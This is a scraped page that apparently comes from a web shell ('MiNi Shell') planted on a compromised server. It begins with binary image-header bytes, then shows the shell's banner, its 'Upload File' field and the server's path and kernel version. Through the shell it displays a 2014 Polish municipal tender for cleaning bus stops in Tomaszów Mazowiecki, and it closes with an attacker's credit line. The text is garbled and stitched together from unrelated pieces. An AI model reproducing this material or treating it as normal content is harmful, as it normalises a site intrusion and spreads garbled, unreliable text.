JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141203/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20141203/250911-N-2014.html

<p class="kh_header"><b>Tomaszów Mazowiecki: Świadczenie usług w zakresie bieżącego utrzymania porządku i czystości na przystankach komunikacyjnych na terenie Miasta Tomaszowa Mazowieckiego.</b><br>
<b>Numer ogłoszenia: 250911 - 2014; data zamieszczenia: 03.12.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina - Miasto Tomaszów Mazowiecki , ul. POW 10/16, 97-200 Tomaszów Mazowiecki, woj. łódzkie, tel. 44 724 23 11, faks 44 724 43 59.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.tomaszow-maz.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług w zakresie bieżącego utrzymania porządku i czystości na przystankach komunikacyjnych na terenie Miasta Tomaszowa Mazowieckiego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.1. INFORMACJE OGÓLNE:

1.1.1.Nazwa zamówienia: 
Świadczenie usług w zakresie bieżącego utrzymania porządku i czystości na przystankach komunikacyjnych na terenie Miasta Tomaszowa Mazowieckiego.

1.1.2. 	Prace z zakresu utrzymania czystości i porządku należy wykonywać:
	a) na przystankach komunikacyjnych z wiatą - na obszarze: wewnątrz wiaty, z przodu - od wiaty do 	krawędzi jezdni, od ścian bocznych i tylnych po 3 metry w każdą stronę,
b) 	na przystankach komunikacyjnych ze słupkiem przystankowym lub grzybkiem -z przodu terenu do 	krawędzi jezdni oraz w promieniu 5 metrów od słupka lub grzybka,
c) 	na przystankach komunikacyjnych z zatoką: na całej długości zatoki i szerokości chodnika wraz z zatoką.

1.1.3. 	Zamawiający zastrzega sobie prawo do zmiany liczby przystanków objętych zamówieniem oraz zmiany 	ich lokalizacji i wyposażenia.

1.1.4. 	Zamawiający zastrzega sobie prawo do zmniejszenia lub zwiększenia zakresu zadania. Zmiany będą 	dotyczyły tylko zakresu, który wyniknie w trakcie realizacji zadania, a będzie niezbędny do właściwego 	zakończenia podstawowego zamówienia.

1.2. ZAKRES I OPIS PRAC PORZĄDKOWYCH:

1.2.1. Bieżące utrzymywanie czystości na przystankach komunikacyjnych;
a)	zbieranie zanieczyszczeń z powierzchni przystanku;
b)	zamiatanie powierzchni przystanku;
c)	odchwaszczanie i wykaszanie terenu;
d)	usuwanie kurzu oraz zabrudzeń z urządzeń przystankowych;
e)	usuwanie naklejek, ogłoszeń i plakatów wieszanych na przystankach, urządzeniach przystankowych bez zgody Zamawiającego (wyjątek stanowią ogłoszenia opatrzone pieczęcią Urzędu Miasta w Tomaszowie Mazowieckim lub Miejskiego Zakładu Komunikacyjnego w Tomaszowie Mazowieckim);
f)	usuwanie graffiti z oszklonych części wiat, konstrukcji wiat, ławek, siedzeń, dachów 
i sufitów wiat;
g)	usuwanie szkła z powierzchni przystanków w przypadku uszkodzenia/wybicia szyb 
w wiatach przystankowych;
h)	montaż ławek przystankowych;
i)	montaż słupków przystankowych;
j)	naprawa i wymiana uszkodzonych słupków przystankowych;
k)	przegląd i naprawa uszkodzonych koszy lub ich elementów;
l)	opróżnianie koszy na śmieci;
m)	uzupełnianie brakujących koszy na śmieci;
n)	drobne naprawy urządzeń stanowiących wyposażenie przystanków tj. konstrukcji wiat, ramek na rozkłady jazdy, kasetonów reklamowych, ławek;
o)	uzupełnianie informacji słowno-graficznej, dotyczącej zakazu palenia wyrobów tytoniowych na przystankach komunikacyjnych.
	ponadto w okresie opadów śniegu lub gołoledzi:
p)	odśnieżanie nawierzchni przystanków komunikacyjnych i usuwanie oblodzeń;
q)	uszorstnianie powierzchni przystanków komunikacyjnych;
r)	usuwanie nawisów śnieżnych i lodowych z urządzeń przystankowych;
s)	odgarnianie śniegu poza obszar przystanku.



1.2.2. Czynności wykonywane okresowo lub w uzgodnionych terminach:
a)	mycie i czyszczenie: szyb, dachów, sufitów i konstrukcji wiat, ławek, siedzeń, słupków, tablic znaków przystankowych, gablot oraz kaset z rozkładami jazdy- dwa razy 
w roku, w miesiącu maju i wrześniu,
b)	utrzymywanie należytego stanu technicznego i estetycznego koszy na śmieci:
- mycie i dezynfekcja koszy na śmieci - 6 razy w roku;
c)	wywóz nadmiaru składowanego śniegu z przystanków komunikacyjnych w miejsce wskazane przez Zamawiającego- wg terminu wskazanego przez Zamawiającego; 
d)	usunięcie materiału uszorstniającego z powierzchni przystanków po okresie zimowym niezwłocznie, nie później niż do 15 kwietnia 2014 r.
e)	malowanie wiat przystankowych bądź ich elementów - wg terminu wskazanego przez Zamawiającego; 
f)	uzupełnienie modułu daszku wiaty przystankowej wykonanego z poliwęglanu - wg terminu wskazanego przez Zamawiającego; 
g)	obsługiwanie kasetonów reklamowych w wiatach przystankowych poprzez: instalowanie reklam (wkłady reklamowe) oraz dbanie o ich estetykę wg terminu wskazanego przez Zamawiającego; 
h)	przygotowywanie podłoża pod montaż wiaty wg terminu wskazanego przez Zamawiającego.

1.3. CZĘSTOTLIWOŚĆ WYKONYWANIA PRAC PORZĄDKOWYCH:

13.1.	Prace wykonywane w ramach utrzymania porządku i czystości na przystankach komunikacyjnych -pkt 1.2.1.	-w dniach, w których nie występują opady śniegu lub gołoledź należy wykonywać na:
a)	przystankach komunikacyjnych kategorii I -  w dniach: poniedziałek, wtorek, środa, czwartek, piątek, do godziny 10.00,
b)	przystankach komunikacyjnych kategorii II-  w dniach: -poniedziałek, piątek do godziny 10.00,
c)	przystankach komunikacyjnych kategorii III - w dniach: środa lub czwartek do godziny 10.00.

1.3.2. 	W dniach, w których występują opady śniegu lub gołoledź należy codziennie wykonywać prace w ramach 	utrzymania porządku i czystości na przystankach komunikacyjnych -pkt 1.2.1 lit. p, q, r, s -w następującej 	kolejności: przystanki kategorii I, przystanki kategorii II, przystanki kategorii III.

1.3.3. 	Czynności wykonywane okresowo lub w uzgodnionych terminach - pkt 1.2.2. należy wykonywać wg 	terminów wskazanych w pkt 1.2.2.  

1.3.4. 	Prace wykonywane w ramach utrzymania czystości i porządku na przystankach komunikacyjnych należy 	również wykonywać każdorazowo po otrzymaniu telefonicznego lub pisemnego zgłoszenia od 	przedstawiciela Zamawiającego lub Straży Miejskiej.	

1.4. ZALECENIA, DOTYCZĄCE WYKONYWANIA PRAC PORZĄDKOWYCH:

1.4.1. 	Wszelkie prace będące przedmiotem zamówienia, w szczególności związane ze sprzątaniem 	przystanków, 	myciem wiat, ławek i słupków, odśnieżaniem oraz usuwaniem odpadów ze sprzątanych 	powierzchni i koszy muszą być prowadzone w sposób bezpieczny i nieuciążliwy dla pasażerów 	komunikacji zbiorowej, przechodniów i innych uczestników ruchu drogowego.

1.4.2. 	Wykonawca bezpośrednio po zakończeniu sprzątania usuwa i wywozi wszelkie zanieczyszczenia z 	powierzchni terenów porządkowych (na swój koszt). Zabrania się zamiatania nieczystości na jezdnię i 	teren otaczający przystanek oraz wyrzucania ich do koszy przystankowych, ulicznych lub należących do 	właścicieli nieruchomości.

1.4.3. 	Usuwanie skutków opadów śniegu lub gołoledzi powinno być rozpoczęte niezwłocznie i zakończone nie 	później niż dwie godziny od ich wystąpienia. Czynności te wykonawca podejmuje we wszystkie dni 	tygodnia, niezależnie od pory dnia oraz od intensywności i czasu trwania opadów.
	Odgarnianie śniegu poza obszar przystanku następuje w sposób nieutrudniający dostępu do przystanku 	oraz do wchodzenia i wychodzenia z pojazdów komunikacji. Nie dopuszcza się zagarniania śniegu na 	jezdnię, bądź jego składowania na trawnikach i pod drzewami. Materiał uszortniający Wykonawca 	uzyskuje we własnym zakresie.



1.4.4. 	Mycie i czyszczenie przystanków powinno się odbywać za pomocą środków chemicznych, których użycie 	nie uszkodzi powierzchni (lakierniczych, oszklonych oraz poliwęglanowych) urządzeń przystankowych.

1.4.5. 	Naprawa uszkodzonych słupków przystankowych obejmuje prostowanie i malowanie renowacyjne 	słupków oraz naprawianie uszkodzonych ramek rozkładu jazdy i tablic słupków. Wymiana słupków 	(pobranych od Zamawiającego) następuje w przypadku, gdy nie nadają się one do naprawy.

1.4.6. 	Wykonawca pobiera brakujące kosze do uzupełnienia od Zamawiającego, bądź wskazanego przez niego 	dostawę, stawia je i/ lub montuje na przystankach komunikacyjnych.  Odległość zamontowanego kosza 	od krawędzi jezdni powinna wynosić, co najmniej 0, 5 m.

1.4.7. 	Wykonawca dokonuje montażu ławki przystankowej, pobranej od Zamawiającego.

1.4.8. 	Sprzęt i urządzenia oraz materiały niezbędne do utrzymania czystości na przystankach komunikacyjnych 	Wykonawca zobowiązuje się uzyskać we własnym zakresie.

1.5. KONTROLA WYKONANIA PRAC:

1.5.1. 	Kontrola wykonywania prac stanowiących przedmiot umowy dokonywana będzie przez Zamawiającego, 	bez udziału przedstawiciela Wykonawcy.

1.5.2. 	Zamawiający nie będzie powiadamiał Wykonawcy o terminie oraz miejscu kontroli.

1.5.3. 	Wyniki kontroli dokumentowane będą protokołem kontroli.

1.5.4. 	W przypadku stwierdzenia niewykonania lub niepełnego wykonania prac na określonych przystankach, 	Zamawiający obciąży Wykonawcę karami określonymi w umowie i wyznaczy termin usunięcia 	stwierdzonych nieprawidłowości. Nie usunięcie przez Wykonawcę nieprawidłowości w wyznaczonym 	terminie jest również podstawą do naliczenia przez zamawiającego kar umownych..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9, 90.90.00.00-5, 90.92.00.00-2, 90.61.00.00-6, 90.62.00.00-9, 90.69.00.00-0, 90.63.00.00-2, 90.50.00.00-2, 77.31.21.00-1, 50.00.00.00-5, 45.23.32.21-4, 45.22.31.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca jest zobowiązany do wniesienia wadium w wysokości: 2.000,00 zł (słownie: dwa tysiące złotych 00/100) w pieniądzu, poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo kredytowej (z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym), gwarancjach bankowych, ubezpieczeniowych, poręczeniach udzielanych przez podmioty o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 roku o Polskiej Agencji Rozwoju Przedsiębiorczości. Wadium należy wnieść przed upływem terminu składania ofert.</p>
<p><b>III.2) ZALICZKI</b></p>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony i podpisany Formularz oferty - część II SIWZ,
	Pełnomocnictwo (jeżeli dotyczy),</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający dopuszcza zmianę wysokości wynagrodzenia wykonawcy w przypadku ustawowej zmiany stawki podatku od towarów i usług.
2.	Jeżeli zajdzie taka konieczność Zamawiający dopuszcza zmianę umowy w zakresie zmniejszenia lub zwiększenia ilości sprzątanych przystanków, ilości mytych wiat, słupków i ławek przystankowych, częstotliwości sprzątania poszczególnych przystanków oraz częstotliwości opróżniania koszy informując pisemnie o zmianach Wykonawcę.
3.	Decyzje i ustalenia wprowadzone przez Zamawiającego będą wiążące dla Wykonawcy i nie będą wymagały wprowadzenia zmian treści umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.tomaszow.miasta.pl/public/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta, 97-200 Tomaszów Mazowiecki, ul. Mościckiego 6 pok. nr 6 (II p.) od poniedziałku do piątku w godz: 7;30-15:30..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.12.2014 godzina 11:00, miejsce: Ofertę należy złożyć w siedzibie Zamawiającego w Tomaszowie Maz. ul. POW 10/16 pok. 12 budynek A (kancelaria).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com